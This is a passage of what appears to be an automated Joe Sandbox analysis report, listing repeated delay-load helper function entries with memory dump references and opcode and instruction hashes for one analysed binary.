      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2fdb676770c14ddd9388dde1955cc0e705bf00911ae5f5f7e954a02bd96d0561
    • Instruction ID: 9410278cd7e13b9b0a8cff5512b5ab09e18781dee5d0afa0cb13aa1b0cfaf70b
    • Opcode Fuzzy Hash: 2fdb676770c14ddd9388dde1955cc0e705bf00911ae5f5f7e954a02bd96d0561
    • Instruction Fuzzy Hash: 4FB012A1268043BC374863157E02F7E025EC3C0B10330803FF401D4082D9400E402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 675183bcb00a46e268f9c4e5034b6b16366a0065ebcd36c7a0dea096a13a0124
    • Instruction ID: 41201e311449218be04fb62c9d980134f2fcefd2101353b775f42e4d5710b649
    • Opcode Fuzzy Hash: 675183bcb00a46e268f9c4e5034b6b16366a0065ebcd36c7a0dea096a13a0124
    • Instruction Fuzzy Hash: 23B01291278043BC374863553E02F7E031EC3C0B10370843FF001D4182D8500D442033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3107f7e1004f7bb49e6b7ba68262ab6bff6af3e68d719e4f52e26326b1a3311c
    • Instruction ID: fed7fca736aade25c89b915a0f3f48c35d3702de7224a1fcbc1643a016c598bd
    • Opcode Fuzzy Hash: 3107f7e1004f7bb49e6b7ba68262ab6bff6af3e68d719e4f52e26326b1a3311c
    • Instruction Fuzzy Hash: 87B012A12A8043BC374863153F02F7E021EC3C0B10330403FF001D8082D9810F412033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3ea54e68cffdf05d5be5415ce4452148efeeadaf28dbc2cc472f2692866e740a
    • Instruction ID: 287d0d9c8a7645929036e900af011c40d33194a118029ca24181787d5219b359
    • Opcode Fuzzy Hash: 3ea54e68cffdf05d5be5415ce4452148efeeadaf28dbc2cc472f2692866e740a
    • Instruction Fuzzy Hash: 00B012A1268043BC374863163E02F7E021EC3C0B10370403FF001D8082D9400E402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: babd15b70835086cf7b9aaaf6f83b88b884235afc00b2aed896ec6e99223484b
    • Instruction ID: 85d3f39e4913adc4117ac1beb646a0e892adc628e40a9c1812ed263c40858877
    • Opcode Fuzzy Hash: babd15b70835086cf7b9aaaf6f83b88b884235afc00b2aed896ec6e99223484b
    • Instruction Fuzzy Hash: 5BB092A126A142BC268863152A12F7E021AC2C0B20330413FB401D4082D84009802032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a65c7cfa3e3bb37a022be9d631804df61b77547c74f479d060190c00011fd8ef
    • Instruction ID: 3b14683efc6d979b009bebf1cbc2d5853bf75ae5a25f2b9b1258e787966583d1
    • Opcode Fuzzy Hash: a65c7cfa3e3bb37a022be9d631804df61b77547c74f479d060190c00011fd8ef
    • Instruction Fuzzy Hash: C3B092952AA042BC268862152A16F7E021AC2C0B20330403FB001D8082D8810A412032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3a3444869f3b21fbdc25c58f940cf18f97ac6244aca1c90bb565726c488951b9
    • Instruction ID: 3a15bcbbe9cb408b3fe79669588218a727adfcee946559ac8ddd7a3fe82792fe
    • Opcode Fuzzy Hash: 3a3444869f3b21fbdc25c58f940cf18f97ac6244aca1c90bb565726c488951b9
    • Instruction Fuzzy Hash: D6B012D1268043BC374863657E02F7E025EC3C0B10330803FF501D4082D9400D402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e2ba617f507d8033a956ac65067cdd402b4da0a390c6b1cae899be6a190db62c
    • Instruction ID: 279a4a66d6b9bdde483a226205a9f6581c99d695149d8eff4ac1c73a0adfa4d0
    • Opcode Fuzzy Hash: e2ba617f507d8033a956ac65067cdd402b4da0a390c6b1cae899be6a190db62c
    • Instruction Fuzzy Hash: 3BB09291269042BC768862152A12F7E025AC6C0B20370403FB001D4082D84009402032
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1584a17132b7ce1ea7027b1eb1a35ffd0cfb931c6cd944bc5c0ee207c1225c3b
    • Instruction ID: 6726fb3a73254f74c8ef12b1d15787636226b2c75a7ce77c59a3f8a87ae14641
    • Opcode Fuzzy Hash: 1584a17132b7ce1ea7027b1eb1a35ffd0cfb931c6cd944bc5c0ee207c1225c3b
    • Instruction Fuzzy Hash: 5AB012F12A8043BC374863153F02F7E02AEC3C0B10330403FF001D8082D8810E412033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: de825f635e1f5db0aef2eb43b3d1633933af84aa1c3c039f453f45ea26820268
    • Instruction ID: fd07f99dd7d2e783a1fdeb8bd0d5d60ca4614685dfd6738df9ecb28566af48f0
    • Opcode Fuzzy Hash: de825f635e1f5db0aef2eb43b3d1633933af84aa1c3c039f453f45ea26820268
    • Instruction Fuzzy Hash: 47B012D1268243BC378863153E02F7E025EC3C0B10330413FF401D4082D8400D802033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 96aa01eec7ace2b46f716048ba8cb97e7b2d824a586a335fb7485c82a5f48829
    • Instruction ID: 4bec00ba2619869da744f94464fd6748a69bd69461a619128ec9bf3fad0e6b40
    • Opcode Fuzzy Hash: 96aa01eec7ace2b46f716048ba8cb97e7b2d824a586a335fb7485c82a5f48829
    • Instruction Fuzzy Hash: B2B012D2268043BC374863153E02F7E025FC3C0B10370413FF001D4082D8400D402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d17bf1a7b982e28f23ef9a8a714285917e4cb0b337333bb697eedefa7a00002c
    • Instruction ID: 4f89b7498f0b1ddfc7e6c89e0eb29b5c35259b8e6885351af2cede8ae5d5561f
    • Opcode Fuzzy Hash: d17bf1a7b982e28f23ef9a8a714285917e4cb0b337333bb697eedefa7a00002c
    • Instruction Fuzzy Hash: 06B01291278143BC379863253E03F7E021EC3C0B10330813FF401D4082D8400D802073
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d8632c4e68d108c8f45bd8f453d175ce782ed207e7510a93742ede963c854e9f
    • Instruction ID: 9fcd00f89ba1278d89b7da4ca43cca829c43e6f96dc5fac6a0bbd983fb3ae121
    • Opcode Fuzzy Hash: d8632c4e68d108c8f45bd8f453d175ce782ed207e7510a93742ede963c854e9f
    • Instruction Fuzzy Hash: 5AB01291278043BC375863257E03F7E021EC3C0B10330803FF401D4082D8400D402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6d2424029e3fa256ca036fee32a15129e66836b82b3c0d59bdd52b6532a90db4
    • Instruction ID: 7812a1798c16cec672fa8746885ed6248e367589b73e4f1db82fa32828a00e31
    • Opcode Fuzzy Hash: 6d2424029e3fa256ca036fee32a15129e66836b82b3c0d59bdd52b6532a90db4
    • Instruction Fuzzy Hash: 78B012D13E8502BE3308A3593E12FBE015EC3C8B50330403FF301D5041D9404C491173
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 470a1553395498a3351eeb3b055421ab2d07faa084186938609c7e58f4946950
    • Instruction ID: b24ef3162f6e64d21ba94c00e3b5ff6526a909cc57d65c7b45f2624428e79bf0
    • Opcode Fuzzy Hash: 470a1553395498a3351eeb3b055421ab2d07faa084186938609c7e58f4946950
    • Instruction Fuzzy Hash: 51B012D13A8602BE370863593E02FBE018EC7C8B50330413FF301D5041D9404C8D1073
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 03b160e737e92bc293849e692b32eca6d0ee131c7c2e410dcec131e856b0d55c
    • Instruction ID: 15368319a807906c64802940011fb263cdb75e9016e05f993fe65dfecb94b1ee
    • Opcode Fuzzy Hash: 03b160e737e92bc293849e692b32eca6d0ee131c7c2e410dcec131e856b0d55c
    • Instruction Fuzzy Hash: C6B012D53B8802BE3308A3597E12FBE014EC3C8B50330423FF341D5041D9404C491073
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
